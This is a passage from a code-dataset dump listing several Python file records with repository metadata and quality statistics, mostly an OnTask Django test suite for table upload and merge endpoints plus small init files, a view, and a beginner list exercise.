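print(len(tree.body), "comparison expressions")
```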

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 1fc39d420921f9339fa61250b477756869835bb3 | 96 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | venv/lib/python3.8/site-packages/debugpy/server/cli.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | ["MIT"] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z |
| max_issues | venv/lib/python3.8/site-packages/debugpy/server/cli.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z |
| max_forks | venv/lib/python3.8/site-packages/debugpy/server/cli.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | ["MIT"] | null | null | null |

content (a single line; not Python source but a pip cache pool path):

```
/home/runner/.cache/pip/pool/0d/b7/81/5c68cfa376ed839e62234334494717ed2c089d359041fd5596c5144b97
```

Quality signals: avg_line_length 96; max_line_length 96; alphanum_fraction 0.895833; num_words 9; num_chars 96; mean_word_length 9.555556; frac_words_unique 1; frac_chars_top_2grams through top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0.489583; frac_chars_whitespace 0; size_file_byte 96; num_lines 1; num_chars_line_max 96; num_chars_line_mean 96; frac_chars_alphabet 0.40625; frac_chars_comments 0; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 1; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 0; py_frac_lines_func_ratio null; py_cate_var_zero null; py_frac_lines_pass 0; py_frac_lines_import 0; py_frac_lines_simplefunc null; py_score_lines_no_logic null; py_frac_lines_print 0.

Hit flags: 1 for num_words, frac_chars_digital, num_lines, frac_chars_alphabet, cate_encoded_data, py_cate_ast; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.
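
The record above is a reminder that `content` is not always source code: a venv checked into the repository left behind a pip cache pool path, presumably the target of a symlink captured at snapshot time. A heuristic sketch for screening out such records (the test is illustrative, not part of the pipeline):

```python
def looks_like_link_target(content: str) -> bool:
    """Flag one-line 'source files' that are just an absolute filesystem path."""
    stripped = content.strip()
    return "\n" not in stripped and stripped.startswith("/") and " " not in stripped

# The debugpy/server/cli.py record above trips this check;
# real one-liners such as stream/feed/__init__.py do not.
```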

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 9516803a4182a158de5fae2cdea3c8e724eee522 | 23,617 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | ontask/table/tests/test_api.py | pinheiroo27/ontask_b | 23fee8caf4e1c5694a710a77f3004ca5d9effeac | ["MIT"] | 33 | 2017-12-02T04:09:24.000Z | 2021-11-07T08:41:57.000Z |
| max_issues | ontask/table/tests/test_api.py | pinheiroo27/ontask_b | 23fee8caf4e1c5694a710a77f3004ca5d9effeac | ["MIT"] | 189 | 2017-11-16T04:06:29.000Z | 2022-03-11T23:35:59.000Z |
| max_forks | ontask/table/tests/test_api.py | pinheiroo27/ontask_b | 23fee8caf4e1c5694a710a77f3004ca5d9effeac | ["MIT"] | 30 | 2017-11-30T03:35:44.000Z | 2022-01-31T03:08:08.000Z |

content:

```python
# -*- coding: utf-8 -*-
"""Test the table API.s"""
import os
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
import pandas as pd
from rest_framework import status
from rest_framework.authtoken.models import Token
from ontask import models, tests
from ontask.column.services import delete_column
from ontask.dataops import pandas
from ontask.table import serializers
class TableApiBase(tests.OnTaskApiTestCase):
"""Basic function and data for testing the API."""
fixtures = ['simple_table']
filename = os.path.join(settings.ONTASK_FIXTURE_DIR, 'simple_table.sql')
new_table = {
"email": ["student04@bogus.com",
"student05@bogus.com",
"student06@bogus.com"
],
"sid": [4, 5, 6],
"age": [122.0, 122.1, 132.2],
"another": ["bbbb", "aaab", "bbbb"],
"name": ["Felipe Lotas", "Aitor Tilla", "Carmelo Coton"],
"one": ["aaaa", "bbbb", "aaaa"],
"registered": [True, False, True],
"when": ["2017-10-12T00:33:44+11:00",
"2017-10-12T00:32:44+11:00",
"2017-10-12T00:32:44+11:00"
]
}
incorrect_table_1 = {
"email": {
"0": "student1@bogus.com",
"1": "student2@bogus.com",
"2": "student3@bogus.com",
"3": "student1@bogus.com"
},
"Another column": {
"0": 6.93333333333333,
"1": 9.1,
"2": 9.1,
"3": 5.03333333333333
},
"Quiz": {
"0": 1,
"1": 0,
"2": 3,
"3": 0
}
}
src_df = {
"sid": [1, 2, 4],
"newcol": ['v1', 'v2', 'v3']
}
src_df2 = {
"sid": [5],
"forcenas": ['value']
}
user_name = 'instructor01@bogus.com'
def setUp(self):
super().setUp()
# Get the token for authentication and set credentials in client
token = Token.objects.get(user__email=self.user_name)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
self.user = get_user_model().objects.get(email=self.user_name)
class TableApiCreate(TableApiBase):
"""Test the api to create a table."""
def test_table_JSON_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_ops', kwargs={'wid': workflow.id}))
# Transform the response into a data frame
r_df = pd.DataFrame(response.data['data_frame'])
r_df = pandas.detect_datetime_columns(r_df)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
# Getting the table attached to the workflow
def test_table_pandas_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_pops', kwargs={'wid': workflow.id}))
# Transform the response into a data frame
r_df = serializers.string_to_df(response.data['data_frame'])
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_try_JSON_overwrite(self):
# Upload a table and try to overwrite an existing one (should fail)
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Override the table
response = self.client.post(
reverse(
'table:api_ops',
kwargs={'wid': workflow.id}),
self.new_table,
format='json')
# Check that the right message is returned
self.assertIn(
'Post request requires workflow without a table',
response.data['detail'])
def test_table_try_pandas_overwrite(self):
# Upload a table and try to overwrite an existing one (should fail)
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Override the table
response = self.client.post(
reverse(
'table:api_pops',
kwargs={'wid': workflow.id}),
self.new_table,
format='json')
# Check that the right message is returned
self.assertIn(
'Post request requires workflow without a table',
response.data['detail'])
def test_table_json_create(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Upload the table
self.client.post(
reverse('table:api_ops', kwargs={'wid': workflow.id}),
{'data_frame': self.new_table},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Transform new table into data frame
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_json_create_error(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Upload the table
response = self.client.post(
reverse('table:api_ops', kwargs={'wid': workflow.id}),
{'data_frame': self.incorrect_table_1},
format='json')
self.assertTrue(
'The data has no column with unique values per row' in
response.data
)
def test_table_pandas_create(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
{'name': tests.wflow_name + '2', 'attributes': {'one': 'two'}},
format='json')
# Get the only workflow in the fixture
workflow = models.Workflow.objects.get(id=response.data['id'])
# Transform new table into a data frame
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload the table
self.client.post(
reverse('table:api_pops', kwargs={'wid': workflow.id}),
{'data_frame': serializers.df_to_string(r_df)},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_JSON_update(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload a new table
self.client.put(
reverse(
'table:api_ops',
kwargs={'wid': workflow.id}),
{'data_frame': self.new_table},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_pandas_update(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
r_df = pandas.detect_datetime_columns(r_df)
# Upload a new table
self.client.put(
reverse(
'table:api_pops',
kwargs={'wid': workflow.id}),
{'data_frame': serializers.df_to_string(r_df)},
format='json')
# Refresh wflow (has been updated)
workflow = models.Workflow.objects.get(id=workflow.id)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_JSON_flush(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Flush the data in the table
self.client.delete(reverse(
'table:api_ops',
kwargs={'wid': workflow.id}))
def test_table_pandas_flush(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Flush the data in the table
self.client.delete(
reverse('table:api_pops', kwargs={'wid': workflow.id}))
class TableApiMerge(TableApiBase):
# Getting the table through the merge API
def test_table_pandas_JSON_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_merge', kwargs={'wid': workflow.id}))
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(response.data['src_df'])
r_df = pandas.detect_datetime_columns(r_df)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(r_df, dframe)
def test_table_pandas_merge_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}))
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = serializers.string_to_df(response.data['src_df'])
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(r_df, dframe)
# Merge and create an empty dataset
def test_table_JSON_merge_to_empty(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.new_table,
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
self.assertEqual(
response.data['detail'],
'Unable to perform merge operation: '
+ 'Merge operation produced a result with no rows')
def test_table_pandas_merge_to_empty(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.new_table)
# Get the data through the API
response = self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
self.assertEqual(response.data['detail'],
'Unable to perform merge operation: '
+ 'Merge operation produced a result with no rows')
# Merge with inner values
def test_table_JSON_merge_to_inner(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the updated object
workflow = models.Workflow.objects.all()[0]
# Result should have two rows
self.assertEqual(workflow.nrows, 2)
def test_table_pandas_merge_to_inner(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "inner",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the updated object
workflow = models.Workflow.objects.all()[0]
# Result should have two rows
self.assertEqual(workflow.nrows, 2)
def test_table_JSON_merge_to_outer(self):
"""Merge with outer values."""
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# No anomaly should be detected
self.assertEqual(None, response.data.get('detail'))
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
def test_table_pandas_merge_to_outer(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
response = self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# No anomaly should be detected
self.assertEqual(None, response.data.get('detail'))
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
# Merge with left values
def test_table_JSON_merge_to_left(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df,
"how": "left",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 3)
dframe = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(dframe[dframe['sid'] == 1]['newcol'].values[0],
self.src_df['newcol'][0])
def test_table_pandas_merge_to_left(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Transform new table into string
r_df = pd.DataFrame(self.src_df)
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "left",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 3)
dframe = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(dframe[dframe['sid'] == 1]['newcol'].values[0],
self.src_df['newcol'][0])
# Merge with outer values but producing NaN everywhere
def test_table_JSON_merge_to_outer_NaN(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Drop the column with booleans because the data type is lost
delete_column(
self.user,
workflow,
workflow.columns.get(name='registered'))
# Transform new table into string
r_df = pd.DataFrame(self.src_df2)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
new_df = pd.merge(
dframe,
r_df,
how="outer",
left_on="sid",
right_on="sid")
# Get the data through the API
self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"src_df": self.src_df2,
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
self.assertEqual(workflow.ncols, 8)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(dframe, new_df)
def test_table_pandas_merge_to_outer_NaN(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
age = workflow.columns.filter(name='age')[0]
age.is_key = False
age.save()
email = workflow.columns.filter(name='email')[0]
email.is_key = False
email.save()
# Drop the column with booleans because the data type is lost
delete_column(
self.user,
workflow,
workflow.columns.get(name='registered'))
# Transform new table into string
r_df = pd.DataFrame(self.src_df2)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
new_df = pd.merge(
dframe,
r_df,
how="outer",
left_on="sid",
right_on="sid")
# Get the data through the API
self.client.put(
reverse('table:api_pmerge', kwargs={'wid': workflow.id}),
{
"src_df": serializers.df_to_string(r_df),
"how": "outer",
"left_on": "sid",
"right_on": "sid"
},
format='json')
# Get the new workflow
workflow = models.Workflow.objects.all()[0]
# Result should have three rows as the initial DF
self.assertEqual(workflow.nrows, 4)
self.assertEqual(workflow.ncols, 8)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements and check wf df consistency
self.compare_tables(dframe, new_df)
# Merge a single row with non-localised date/time fields.
def test_table_JSON_merge_datetimes(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.put(
reverse('table:api_merge', kwargs={'wid': workflow.id}),
{
"how": "outer",
"left_on": "sid",
"right_on": "sid",
"src_df": {
"sid": {"0": 4},
"email": {"0": "student04@bogus.com"},
"age": {"0": 14},
"tstamp1": {"0": ""},
"tstamp2": {"0": "2019-05-10 20:40:48.269638"},
"tstamp3": {"0": "2019-06-03 15:28:59.787917"},
"tstamp4": {"0": "2019-06-03 15:28:59.787917+09:30"},
},
},
format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
workflow = models.Workflow.objects.all()[0]
dst_df = pandas.load_table(workflow.get_data_frame_table_name())
self.assertEqual(workflow.nrows, 4)
self.assertEqual(
workflow.columns.get(name='tstamp2').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp2'].dropna()))
self.assertEqual(
workflow.columns.get(name='tstamp3').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp3'].dropna()))
self.assertEqual(
workflow.columns.get(name='tstamp4').data_type,
'datetime')
self.assertTrue(all(
elem.tzinfo is not None and elem.tzinfo.utcoffset(elem) is not None
for elem in dst_df['tstamp4'].dropna()))
```

Quality signals: avg_line_length 32.396433; max_line_length 79; alphanum_fraction 0.571537; num_words 2,865; num_chars 23,617; mean_word_length 4.569983; frac_words_unique 0.096335; frac_chars_top_2grams 0.021996; frac_chars_top_3grams 0.065531; frac_chars_top_4grams 0.086382; frac_chars_dupe_5grams 0.853586; frac_chars_dupe_6grams 0.848316; frac_chars_dupe_7grams 0.838463; frac_chars_dupe_8grams 0.822424; frac_chars_dupe_9grams 0.803254; frac_chars_dupe_10grams 0.802643; frac_chars_replacement_symbols 0; frac_chars_digital 0.018319; frac_chars_whitespace 0.315832; size_file_byte 23,617; num_lines 728; num_chars_line_max 80; num_chars_line_mean 32.440934; frac_chars_alphabet 0.791992; frac_chars_comments 0.177838; cate_xml_start 0; frac_lines_dupe_lines 0.662921; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0.113942; frac_chars_long_word_length 0.009547; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0.060674; py_cate_ast 1; py_frac_lines_func_ratio 0.05618; py_cate_var_zero false; py_frac_lines_pass 0; py_frac_lines_import 0.024719; py_frac_lines_simplefunc 0; py_score_lines_no_logic 0.103371; py_frac_lines_print 0.

Hit flags: 1 for frac_chars_dupe_5grams through frac_chars_dupe_10grams; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 9522e35e6e087c0acb6cec038a8c28c398c20999 | 113 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | beeng/__init__.py | sbi-aau/beeng-py | d484641fe5a54671369a5d11d4c8418d33098b82 | ["BSD-3-Clause"] | null | null | null |
| max_issues | beeng/__init__.py | sbi-aau/beeng-py | d484641fe5a54671369a5d11d4c8418d33098b82 | ["BSD-3-Clause"] | null | null | null |
| max_forks | beeng/__init__.py | sbi-aau/beeng-py | d484641fe5a54671369a5d11d4c8418d33098b82 | ["BSD-3-Clause"] | null | null | null |

content:

```python
# -*- coding: utf-8 -*-
from beeng.engine import Engine
from beeng.finder import find_all_engines_from_registry
```

Quality signals: avg_line_length 22.6; max_line_length 55; alphanum_fraction 0.778761; num_words 17; num_chars 113; mean_word_length 4.941176; frac_words_unique 0.705882; frac_chars_top_2grams 0.214286; frac_chars_top_3grams 0; frac_chars_top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0.010101; frac_chars_whitespace 0.123894; size_file_byte 113; num_lines 4; num_chars_line_max 56; num_chars_line_mean 28.25; frac_chars_alphabet 0.838384; frac_chars_comments 0.185841; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0; py_cate_var_zero true; py_frac_lines_pass 0; py_frac_lines_import 1; py_frac_lines_simplefunc 0; py_score_lines_no_logic 1; py_frac_lines_print 0.

Hit flags: 1 for frac_chars_top_2grams, num_lines, py_cate_var_zero, py_frac_lines_import, py_score_lines_no_logic; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 1f01cf05d11224e31c0a85c3a700959d397d667a | 184 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | cms/cms/views.py | dhantelrp/django-lab | cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8 | ["Unlicense"] | null | null | null |
| max_issues | cms/cms/views.py | dhantelrp/django-lab | cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8 | ["Unlicense"] | null | null | null |
| max_forks | cms/cms/views.py | dhantelrp/django-lab | cff9f7bbd338740ab053ca8cc0b3feb599ad0cd8 | ["Unlicense"] | null | null | null |

content:

```python
from django.shortcuts import render
from django.http import HttpResponse
def welcome(request):
# return HttpResponse("hello bosku!!!")
return render(request, 'welcome.html')
```

Quality signals: avg_line_length 23; max_line_length 43; alphanum_fraction 0.75; num_words 22; num_chars 184; mean_word_length 6.272727; frac_words_unique 0.636364; frac_chars_top_2grams 0.144928; frac_chars_top_3grams 0; frac_chars_top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0; frac_chars_whitespace 0.146739; size_file_byte 184; num_lines 7; num_chars_line_max 44; num_chars_line_mean 26.285714; frac_chars_alphabet 0.878981; frac_chars_comments 0.201087; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0.082759; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0.25; py_cate_var_zero false; py_frac_lines_pass 0; py_frac_lines_import 0.5; py_frac_lines_simplefunc 0.25; py_score_lines_no_logic 1; py_frac_lines_print 0.

Hit flags: 1 for num_lines, py_frac_lines_func_ratio, py_frac_lines_import, py_frac_lines_simplefunc, py_score_lines_no_logic; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 1f3c784ac5e41be6aa9922a0930c55323f57e3dd | 35 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | stream/feed/__init__.py | Werded/stream-python | 3d7ad183ded383bf1d988e2165bc697e15036ac1 | ["BSD-3-Clause"] | null | null | null |
| max_issues | stream/feed/__init__.py | Werded/stream-python | 3d7ad183ded383bf1d988e2165bc697e15036ac1 | ["BSD-3-Clause"] | null | null | null |
| max_forks | stream/feed/__init__.py | Werded/stream-python | 3d7ad183ded383bf1d988e2165bc697e15036ac1 | ["BSD-3-Clause"] | null | null | null |

content:

```python
from .feeds import AsyncFeed, Feed
```

Quality signals: avg_line_length 17.5; max_line_length 34; alphanum_fraction 0.8; num_words 5; num_chars 35; mean_word_length 5.6; frac_words_unique 1; frac_chars_top_2grams through top_4grams 0; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0; frac_chars_whitespace 0.142857; size_file_byte 35; num_lines 1; num_chars_line_max 35; num_chars_line_mean 35; frac_chars_alphabet 0.933333; frac_chars_comments 0; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0; py_cate_var_zero true; py_frac_lines_pass 0; py_frac_lines_import 1; py_frac_lines_simplefunc 0; py_score_lines_no_logic 1; py_frac_lines_print 0.

Hit flags: 1 for num_words, num_chars, num_lines, py_cate_var_zero, py_frac_lines_import, py_score_lines_no_logic; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 1f8f5b2c9cc0bf9a25e5a8bdcb402e146b9b0f50 | 122 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py | myarist/Codecademy | 2ba0f104bc67ab6ef0f8fb869aa12aa02f5f1efb | ["MIT"] | 23 | 2021-06-06T15:35:55.000Z | 2022-03-21T06:53:42.000Z |
| max_issues | Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | ["MIT"] | null | null | null |
| max_forks | Data Scientist Career Path/3. Python Fundamentals/5. Python List/3. Working with List/3. list range.py | shivaniverma1/Data-Scientist | f82939a411484311171465591455880c8e354750 | ["MIT"] | 9 | 2021-06-08T01:32:04.000Z | 2022-03-18T15:38:09.000Z |

content:

```python
# Your code below:
number_list = range(9)
print(list(number_list))
zero_to_seven = range(8)
print(list(zero_to_seven))
```

Quality signals: avg_line_length 15.25; max_line_length 26; alphanum_fraction 0.745902; num_words 21; num_chars 122; mean_word_length 4.047619; frac_words_unique 0.571429; frac_chars_top_2grams 0.235294; frac_chars_top_3grams 0.235294; frac_chars_top_4grams 0.352941; frac_chars_dupe_5grams through dupe_10grams 0; frac_chars_replacement_symbols 0; frac_chars_digital 0.018692; frac_chars_whitespace 0.122951; size_file_byte 122; num_lines 8; num_chars_line_max 26; num_chars_line_mean 15.25; frac_chars_alphabet 0.775701; frac_chars_comments 0.131148; cate_xml_start 0; frac_lines_dupe_lines 0; cate_autogen 0; frac_lines_long_string 0; frac_chars_string_length 0; frac_chars_long_word_length 0; frac_lines_string_concat 0; cate_encoded_data 0; frac_chars_hex_words 0; frac_lines_prompt_comments 0; frac_lines_assert 0; py_cate_ast 1; py_frac_lines_func_ratio 0; py_cate_var_zero false; py_frac_lines_pass 0; py_frac_lines_import 0; py_frac_lines_simplefunc 0; py_score_lines_no_logic 0; py_frac_lines_print 0.5.

Hit flags: 1 for num_words, frac_chars_top_2grams, frac_chars_top_3grams, frac_chars_top_4grams, num_lines, py_frac_lines_print; null for frac_words_unique and frac_lines_string_concat; 0 for the rest. effective: 0; hits: 6.

---

| hexsha | size | ext | lang |
|---|---|---|---|
| 2f09e20dc1f845d8e664b0c970c26c2fb78252be | 24,912 | py | Python |

| | repo_path | repo_name | head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | tests/api/test_event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | ["MIT"] | 1 | 2021-06-01T14:49:18.000Z | 2021-06-01T14:49:18.000Z |
| max_issues | tests/api/test_event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | ["MIT"] | 286 | 2020-12-04T14:13:00.000Z | 2022-03-09T19:05:16.000Z |
